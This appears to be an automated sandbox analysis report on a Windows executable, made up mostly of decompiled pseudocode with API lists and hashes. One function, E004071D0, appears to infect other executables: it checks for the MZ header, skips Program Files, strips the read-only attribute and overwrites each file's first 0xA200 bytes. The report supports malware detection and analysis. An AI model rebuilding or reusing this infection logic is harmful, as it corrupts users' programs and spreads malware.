				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				void* _t255;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
								E004061E0(_v52, _t255, __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}







































































                                                            0x00406639
                                                            0x0040663b
                                                            0x00406644
                                                            0x00406647
                                                            0x0040664a
                                                            0x0040664d
                                                            0x00406651
                                                            0x00406657
                                                            0x00406660
                                                            0x00406661
                                                            0x00406663
                                                            0x00406665
                                                            0x00406665
                                                            0x00406668
                                                            0x00406677
                                                            0x0040667c
                                                            0x0040667f
                                                            0x00406b1c
                                                            0x00406b25
                                                            0x00406685
                                                            0x0040668f
                                                            0x00406697
                                                            0x004066a3
                                                            0x004066af
                                                            0x004066b4
                                                            0x004066b5
                                                            0x004066ba
                                                            0x004066bd
                                                            0x004066c3
                                                            0x004066c7
                                                            0x00406877
                                                            0x0040687a
                                                            0x0040687c
                                                            0x0040687e
                                                            0x00406aeb
                                                            0x00406aeb
                                                            0x00406aed
                                                            0x00406af0
                                                            0x00406af3
                                                            0x00406afb
                                                            0x00406b03
                                                            0x00406b10
                                                            0x00406884
                                                            0x00406884
                                                            0x00406884
                                                            0x00406885
                                                            0x00406888
                                                            0x00406892
                                                            0x00406895
                                                            0x00406898
                                                            0x004068a0
                                                            0x004068a3
                                                            0x004068a5
                                                            0x004068b1
                                                            0x004068be
                                                            0x004068c3
                                                            0x004068c9
                                                            0x004068d9
                                                            0x004068de
                                                            0x004068e5
                                                            0x004068e8
                                                            0x004068eb
                                                            0x004068ed
                                                            0x004068f1
                                                            0x004068f1
                                                            0x004068f3
                                                            0x004068f3
                                                            0x004068f6
                                                            0x0040690a
                                                            0x0040690d
                                                            0x00406912
                                                            0x0040691f
                                                            0x0040691f
                                                            0x00406927
                                                            0x00406939
                                                            0x0040693e
                                                            0x00406943
                                                            0x00406946
                                                            0x00406954
                                                            0x00406959
                                                            0x0040695c
                                                            0x00406968
                                                            0x0040696a
                                                            0x00406a08
                                                            0x00406a12
                                                            0x00406970
                                                            0x00406981
                                                            0x00406986
                                                            0x0040698a
                                                            0x0040698d
                                                            0x004069a0
                                                            0x004069a0
                                                            0x004069a3
                                                            0x004069e1
                                                            0x004069a5
                                                            0x004069a5
                                                            0x004069a8
                                                            0x004069ed
                                                            0x004069ed
                                                            0x004069a8
                                                            0x0040698f
                                                            0x0040698f
                                                            0x004069d5
                                                            0x00406991
                                                            0x00406991
                                                            0x00406991
                                                            0x00406992
                                                            0x004069b1
                                                            0x00406994
                                                            0x00406994
                                                            0x00406994
                                                            0x00406997
                                                            0x004069bd
                                                            0x00406999
                                                            0x00406999
                                                            0x0040699c
                                                            0x004069c9
                                                            0x004069c9
                                                            0x0040699c
                                                            0x00406997
                                                            0x00406992
                                                            0x0040698f
                                                            0x0040698d
                                                            0x00406a1a
                                                            0x00406a1e
                                                            0x00406a89
                                                            0x00406a9d
                                                            0x00406aa7
                                                            0x00406ab0
                                                            0x00406ac0
                                                            0x00406acb
                                                            0x00406ad0
                                                            0x00406ad2
                                                            0x00000000
                                                            0x00406ad4
                                                            0x00406ad4
                                                            0x00000000
                                                            0x00406ad4
                                                            0x00406a20
                                                            0x00406a37
                                                            0x00406a45
                                                            0x00406a47
                                                            0x00406a58
                                                            0x00406a69
                                                            0x00406a75
                                                            0x00406a7a
                                                            0x00406a7b
                                                            0x00406a7d
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00406a7f
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00000000
                                                            0x00406a49
                                                            0x00406a47
                                                            0x0040695e
                                                            0x0040695e
                                                            0x00000000
                                                            0x0040695e
                                                            0x004068a7
                                                            0x004068a7
                                                            0x004068ab
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004068ab
                                                            0x00000000
                                                            0x00406adb
                                                            0x00406adb
                                                            0x00406ade
                                                            0x00406ae2
                                                            0x00406ae2
                                                            0x00406ae2
                                                            0x00406ae2
                                                            0x00000000
                                                            0x00406895
                                                            0x004066cd
                                                            0x004066ce
                                                            0x004066d4
                                                            0x004066d7
                                                            0x004066da
                                                            0x004066e2
                                                            0x004066e7
                                                            0x00000000
                                                            0x00000000
                                                            0x00406700
                                                            0x00406705
                                                            0x0040670b
                                                            0x00406713
                                                            0x0040671f
                                                            0x0040671f
                                                            0x0040672e
                                                            0x00406733
                                                            0x00406738
                                                            0x0040673d
                                                            0x00406752
                                                            0x0040675c
                                                            0x0040676b
                                                            0x00406770
                                                            0x00406789
                                                            0x0040678e
                                                            0x00406792
                                                            0x00406796
                                                            0x004067b1
                                                            0x004067b1
                                                            0x004067c2
                                                            0x004067c5
                                                            0x004067d7
                                                            0x004067dd
                                                            0x004067f4
                                                            0x004067f9
                                                            0x004067fd
                                                            0x004067df
                                                            0x004067e4
                                                            0x004067e9
                                                            0x004067e9
                                                            0x004067c7
                                                            0x004067cc
                                                            0x004067d1
                                                            0x004067d1
                                                            0x00406798
                                                            0x00406798
                                                            0x0040679d
                                                            0x00000000
                                                            0x0040679f
                                                            0x0040679f
                                                            0x004067a3
                                                            0x004067ab
                                                            0x004067ab
                                                            0x0040679d
                                                            0x0040673f
                                                            0x0040673f
                                                            0x0040673f
                                                            0x00406813
                                                            0x0040681d
                                                            0x00406826
                                                            0x0040683c
                                                            0x00406842
                                                            0x00406858
                                                            0x00406867
                                                            0x0040686a
                                                            0x0040686e
                                                            0x0040686e
                                                            0x0040686e
                                                            0x00406871
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040685a
                                                            0x0040685a
                                                            0x00000000
                                                            0x0040685a
                                                            0x00000000
                                                            0x00406858
                                                            0x00000000
                                                            0x004066d7
                                                            0x004066c7
                                                            0x00000000

                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                            • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                              • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                              • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                              • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                              • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CopyImage$B380
                                                            • String ID: (
                                                            • API String ID: 1117845954-3887548279
                                                            • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                            • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                            • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                            • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004071D0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E00407493);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x40748c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407130(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E00407080( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}
























                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d4
                                                            0x004071d4
                                                            0x00407466
                                                            0x00407468
                                                            0x0040746b
                                                            0x0040746e
                                                            0x0040747e
                                                            0x0040748b
                                                            0x004071d9
                                                            0x004071d9
                                                            0x004071df
                                                            0x004071e0
                                                            0x004071e0
                                                            0x004071e1
                                                            0x00000000
                                                            0x004071e3
                                                            0x004071ec
                                                            0x004071f1
                                                            0x004071f7
                                                            0x004071fd
                                                            0x00407203
                                                            0x0040720f
                                                            0x00407216
                                                            0x00407217
                                                            0x0040721c
                                                            0x0040721f
                                                            0x00407222
                                                            0x00407236
                                                            0x0040724b
                                                            0x0040725a
                                                            0x00407268
                                                            0x00407273
                                                            0x00407283
                                                            0x0040728c
                                                            0x00407290
                                                            0x00407298
                                                            0x004072a4
                                                            0x004072b7
                                                            0x004072bf
                                                            0x004072de
                                                            0x004072e8
                                                            0x004072fc
                                                            0x00407303
                                                            0x00407309
                                                            0x00407315
                                                            0x00407318
                                                            0x0040731d
                                                            0x00407325
                                                            0x0040732a
                                                            0x0040732a
                                                            0x00407334
                                                            0x0040733b
                                                            0x00407344
                                                            0x0040734d
                                                            0x00407359
                                                            0x00407368
                                                            0x00407379
                                                            0x00407380
                                                            0x00407387
                                                            0x00407399
                                                            0x0040739e
                                                            0x004073b1
                                                            0x004073bd
                                                            0x004073d2
                                                            0x004073e4
                                                            0x004073f7
                                                            0x0040740a
                                                            0x00407415
                                                            0x00407426
                                                            0x00407431
                                                            0x00407443
                                                            0x00407443
                                                            0x004073bd
                                                            0x0040744a
                                                            0x00407455
                                                            0x00407461
                                                            0x00407461
                                                            0x00407455
                                                            0x00407303
                                                            0x004072e8
                                                            0x004072bf
                                                            0x00407298
                                                            0x00000000
                                                            0x0040724b

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                              • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                              • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                              • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                              • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Attributes$CreatePointerReadWrite
                                                            • String ID: M$MZP$Z$\PROGRA~1\
                                                            • API String ID: 997383822-4093836345
                                                            • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                            • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                            • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                            • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x4809d0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}








                                                            0x0040178d
                                                            0x0040178e
                                                            0x00401793
                                                            0x00401796
                                                            0x00401799
                                                            0x0040179e
                                                            0x004017aa
                                                            0x004017ac
                                                            0x004017b1
                                                            0x004017b1
                                                            0x004017bb
                                                            0x004017c5
                                                            0x004017cf
                                                            0x004017db
                                                            0x004017e0
                                                            0x004017ec
                                                            0x004017ee
                                                            0x004017f3
                                                            0x004017f3
                                                            0x004017fb
                                                            0x004017ff
                                                            0x00401800
                                                            0x0040180c
                                                            0x0040180f
                                                            0x00401811
                                                            0x00401816
                                                            0x00401816
                                                            0x0040181f
                                                            0x00401822
                                                            0x00401825
                                                            0x00401831
                                                            0x00401833
                                                            0x00401838
                                                            0x00000000
                                                            0x00401838
                                                            0x0040183d

                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID:
                                                            • API String ID: 730355536-0
                                                            • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                            • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                            • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                            • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 89%
                                                            			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t65;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					_t65 = E00406638(_v28, _v16, E00403970()); // executed
					if(_t65 == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}




























                                                            0x00406b53
                                                            0x00406b56
                                                            0x00406b59
                                                            0x00406b5c
                                                            0x00406b61
                                                            0x00406b62
                                                            0x00406b67
                                                            0x00406b6a
                                                            0x00406b6d
                                                            0x00406b72
